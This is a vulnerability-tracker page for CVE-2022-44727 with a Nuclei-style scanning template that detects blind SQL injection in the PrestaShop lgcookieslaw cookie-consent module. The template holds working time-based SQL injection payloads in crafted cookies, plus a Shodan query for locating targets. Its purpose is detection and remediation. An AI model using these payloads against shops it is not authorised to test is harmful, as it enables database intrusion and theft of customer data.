| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2022-44727 | 13 Nov 2022 05:49 | – | circl |
| PrestaShop SQL injection vulnerability | 10 Nov 2022 00:00 | – | cnnvd |
| CVE-2022-44727 | 10 Nov 2022 00:00 | – | cve |
| CVE-2022-44727 | 10 Nov 2022 00:00 | – | cvelist |
| EUVD-2022-47661 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2022-44727 | 10 Nov 2022 17:15 | – | nvd |
| CVE-2022-44727 | 10 Nov 2022 17:15 | – | osv |
| Sql injection | 10 Nov 2022 17:15 | – | prion |
| PT-2022-27286 · Prestashop · Eu Cookie Law Gdpr | 10 Nov 2022 00:00 | – | ptsecurity |
| CVE-2022-44727 | 23 May 2025 00:15 | – | redhatcve |

```yaml
id: CVE-2022-44727

info:
  name: PrestaShop lgcookieslaw - SQL Injection
  author: mastercho
  severity: critical
  description: |
    The EU Cookie Law GDPR (Banner + Blocker) PrestaShop module before 2.1.3 allows blind SQL injection via the __lglaw or lgcookieslaw cookie used to store user consent choices.
  impact: |
    Successful exploitation allows unauthenticated attackers to read or modify the shop database, including customer PII and payment-related data.
  remediation: |
    Upgrade the lgcookieslaw module to version 2.1.3 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44727
    - https://security.friendsofpresta.org/modules/2022/11/06/lgcookieslaw.html
    - https://web.archive.org/web/2/https://securityandstuff.com/posts/cve-2022-44727/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44727
    epss-score: 0.02397
    epss-percentile: 0.81984
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
    vendor: lineagrafica
    product: eu_cookie_law_gdpr
    framework: prestashop
    shodan-query:
      - http.component:"Prestashop"
      - http.component:"prestashop"
  tags: cve,cve2022,prestashop,prestashop-module,sqli,time-based-sqli,lgcookieslaw,unauth

variables:
  rand_num: "{{rand_int(1000,9999)}}"
  lglaw_v1: "2,3,4,5) AND (SELECT {{rand_num}} FROM (SELECT(SLEEP(10)))vkBH) AND (9297=9297"
  lglaw_v2_json: "{\"lgcookieslaw_accepted_purposes\":\"[\\\"1\\\",\\\"2\\\",\\\"3\\\",\\\"4\\\",\\\"5) AND (SELECT {{rand_num}} FROM (SELECT(SLEEP(10)))vkBH) AND (9297=9297\\\"]\"}"
  lglaw_v2: "{{base64(lglaw_v2_json)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /modules/lgcookieslaw/views/css/front.css HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /modules/lgcookieslaw/views/js/front.js HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(tolower(body), 'lgcookieslaw')
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}
        Cookie: __lglaw={{lglaw_v1}}

      - |
        @timeout: 20s
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}
        Cookie: lgcookieslaw={{lglaw_v2}}

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        name: lglaw-v1-sqli
        dsl:
          - duration_1 >= 10
          - status_code_1 == 200
        condition: and

      - type: dsl
        name: lglaw-v2-sqli
        dsl:
          - duration_2 >= 10
          - status_code_2 == 200
        condition: and
# digest: 4a0a0047304502207aa8c3bad45d3765e82589fb4f7109dce1f8b83e0e10f87dc4631cfe0003fe5a0221008554cbfadb94b77aac5b9afbbcc2bd1153b5c2b5ae257b4d5fbe325b44852ad8:922c64590222798bb761d5b6d8e72950
```